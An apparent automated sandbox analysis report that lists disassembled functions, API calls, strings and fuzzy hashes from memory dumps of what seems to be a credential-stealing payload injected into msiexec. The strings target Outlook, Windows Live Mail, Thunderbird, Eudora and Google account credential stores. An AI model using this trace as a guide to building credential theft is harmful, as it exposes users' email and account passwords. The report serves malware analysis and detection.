• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2773794195-880857682
APIs
• memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
• memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
• memset.MSVCRT ref: 0042BAAE
• memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
APIs
  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
• ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
• ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040A908
• free.MSVCRT ref: 0040A92B
• memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
APIs
• memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
• memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID:
• API String ID: 231171946-0
APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
                                                                                                        • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                        • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcslen$wcscat$wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1961120804-0
                                                                                                        • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                        • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                        • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                        • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                        Execution Graph

                                                                                                        Execution Coverage: 2.1%
                                                                                                        Dynamic/Decrypted Code Coverage: 0%
                                                                                                        Signature Coverage: 0.5%
                                                                                                        Total number of Nodes: 762
                                                                                                        Total number of Limit Nodes: 20

Control-flow Graph

Rendered graph omitted; function entry basic block 4082cd-40841a.
APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
• Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

Control-flow Graph

Rendered graph omitted; function entry basic block 407ef8-407f01.
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770
• Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
• Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
• Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
• Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

Control-flow Graph

APIs
• memset.MSVCRT ref: 00401E8B
• strlen.MSVCRT ref: 00401EA4
• strlen.MSVCRT ref: 00401EB2
• strlen.MSVCRT ref: 00401EF8
• strlen.MSVCRT ref: 00401F06
• memset.MSVCRT ref: 00401FB1
• atoi.MSVCRT(?), ref: 00401FE0
• memset.MSVCRT ref: 00402003
• sprintf.MSVCRT ref: 00402030
• memset.MSVCRT ref: 00402086
• memset.MSVCRT ref: 0040209B
• strlen.MSVCRT ref: 004020A1
• strlen.MSVCRT ref: 004020AF
• strlen.MSVCRT ref: 004020E2
• strlen.MSVCRT ref: 004020F0
• memset.MSVCRT ref: 00402018
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
• _mbscpy.MSVCRT(?,00000000), ref: 00402177
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 3833278029-4223776976
• Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
• Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
• Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
• Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

Control-flow Graph

APIs
  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
• DeleteObject.GDI32(?), ref: 0040D1A6
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
• Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
• Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
• Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

Control-flow Graph

APIs
  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• _mbscpy.MSVCRT(?,?), ref: 00403E54
Strings
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
• www.google.com/Please log in to your Gmail account, xrefs: 00403C86
• pstorec.dll, xrefs: 00403C30
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
• www.google.com/Please log in to your Google Account, xrefs: 00403C9A
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
• PStoreCreateInstance, xrefs: 00403C44
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc_mbscpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 1197458902-317895162
• Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
• Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
• Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
• Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

Control-flow Graph

Rendered graph omitted; function entry basic block 444c4a-444c66.
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID: k:v
• API String ID: 3662548030-4078055367
• Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
• Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
• Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
• Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

Control-flow Graph

APIs
• memset.MSVCRT ref: 0044430B
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
• memset.MSVCRT ref: 00444379
• memset.MSVCRT ref: 00444394
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
• strlen.MSVCRT ref: 004443DB
• _strcmpi.MSVCRT ref: 00444401
Strings
• \Microsoft\Windows Mail, xrefs: 00444329
• \Microsoft\Windows Live Mail, xrefs: 00444350
• Store Root, xrefs: 004443A5
• Software\Microsoft\Windows Live Mail, xrefs: 004443AA
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
• String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
• API String ID: 3203569119-2578778931
• Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
• Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
• Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
• Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2054149589-0
                                                                                                        • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                        • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                        • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                        • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 317 40baa0-40bab3 call 407e30 324 40bab5-40bac1 317->324 325 40bafa-40bb09 SetCursor 317->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->317 332->317 333->317 334->317
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor_mbsicmpqsort
                                                                                                        • String ID: /nosort$/sort
                                                                                                        • API String ID: 882979914-1578091866
                                                                                                        • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                        • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                        • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                        • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004109F7
                                                                                                          • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                          • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                        • memset.MSVCRT ref: 00410A32
                                                                                                        • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 3143880245-0
                                                                                                        • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                        • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                        • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                        • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                        • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                        • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                        • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 377 410e45-410e4f call 410a9c 372->377 373->372 376 410e22-410e25 373->376 376->372 380 410e37-410e40 376->380 386 410e51-410e76 call 410d3d call 410add 377->386 387 410e7f-410e92 _mbscpy 377->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->377 382->371 384 410de9-410dec 382->384 384->371 384->379 389 410e95-410e97 385->389 386->387 387->389
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                          • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                        • memset.MSVCRT ref: 00410E10
                                                                                                        • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                        Memory Dump Source
